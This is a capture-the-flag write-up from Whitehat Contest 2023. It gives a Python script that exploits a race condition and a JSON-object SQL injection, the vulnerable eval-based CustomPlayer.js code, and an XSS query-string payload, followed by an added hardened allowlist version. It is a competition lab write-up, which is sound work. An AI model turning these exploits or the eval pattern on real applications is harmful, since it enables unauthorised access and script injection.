
Whitehat Contest 2023

Information

Team name: YouAreMyUniverse
Rank: 3rd place

Write up

web/atten-dance

Desc

Get the first flag with a race condition attack.
Get the second flag with SQL injection (JSON injection).

Exploit

import requests
import threading
import time

url = 'http://13.209.18.49:3000'

# Flag 1: race condition, 100 concurrent /check requests for one user

requests.get(f"{url}/join", params={"username": "dummy"})
time.sleep(1)

def worker(thread_num):
    requests.get(f"{url}/check", params={"username": "dummy"})

threads = []

for i in range(100):
    thread = threading.Thread(target=worker, args=(i,))
    threads.append(thread)
    thread.start()

res = requests.get(f"{url}/claim", params={"username": "dummy"})
print(res.text)

# Flag 2: JSON injection, username is sent as an object instead of a string

res = requests.post(f"{url}/del", json={"username": {"contains": "a"}})
print(res.text)

web/oshinolist

Desc

XSS with eval

// File: CustomPlayer.js

$("video[id*=video_]").on("loadeddata", function () {
    const selected_id = $(this).attr("id").replace("video_", "");
    if ($("#source_" + selected_id).length == 0) {
        try {
            eval(`type_${selected_id}()`);
        } catch (e) { }
    }
});

Exploit

?urls=https://video.mp4,https://video.mp4?a.a:eval(atob("payload"))
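
A hardened form of the CustomPlayer.js dispatch shown above, as an added example that is not part of the original write-up or the challenge source: the id is validated and looked up in an allowlist instead of being interpolated into eval. The names makeRegistry, resolveTypeHandler and onLoadedData, the id pattern and the sample ids are assumptions.

```javascript
// Added example (not challenge code). All names here are hypothetical.
// Assumption: legitimate ids are short alphanumeric/underscore tokens.
const ID_PATTERN = /^[A-Za-z0-9_]{1,32}$/;

// Build an allowlist of handlers. A null-prototype object has no inherited
// keys, so ids such as "constructor" or "__proto__" resolve to nothing.
function makeRegistry(handlers) {
  const reg = Object.create(null);
  for (const [id, fn] of Object.entries(handlers)) {
    if (ID_PATTERN.test(id) && typeof fn === "function") reg[id] = fn;
  }
  return Object.freeze(reg);
}

// Map an element id ("video_<id>") to a registered handler, or null.
function resolveTypeHandler(registry, elementId) {
  if (typeof elementId !== "string" || !elementId.startsWith("video_")) return null;
  const id = elementId.slice("video_".length);
  if (!ID_PATTERN.test(id)) return null; // rejects ?, :, (, ), quotes, dots
  const fn = registry[id];
  return typeof fn === "function" ? fn : null;
}

// Replacement for eval(`type_${selected_id}()`): call only what is registered.
function onLoadedData(registry, elementId) {
  const fn = resolveTypeHandler(registry, elementId);
  if (fn === null) return false;
  fn();
  return true;
}

// Constructed sample ids: one registered, one shaped like the payload above.
const log = [];
const registry = makeRegistry({ hls: () => log.push("hls handler ran") });
for (const id of ["video_hls", 'video_x?a.a:eval(atob("payload"))', "video_constructor"]) {
  console.log(JSON.stringify(id), "->", onLoadedData(registry, id));
}
// In CustomPlayer.js the handler body would become:
//   onLoadedData(registry, $(this).attr("id"));
```
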

Comment

It was a fun and helpful CTF with a good-quality wargame.
I'm happy to have won third place, and I am thankful to the team members.

This post is licensed under CC BY 4.0 by the author.
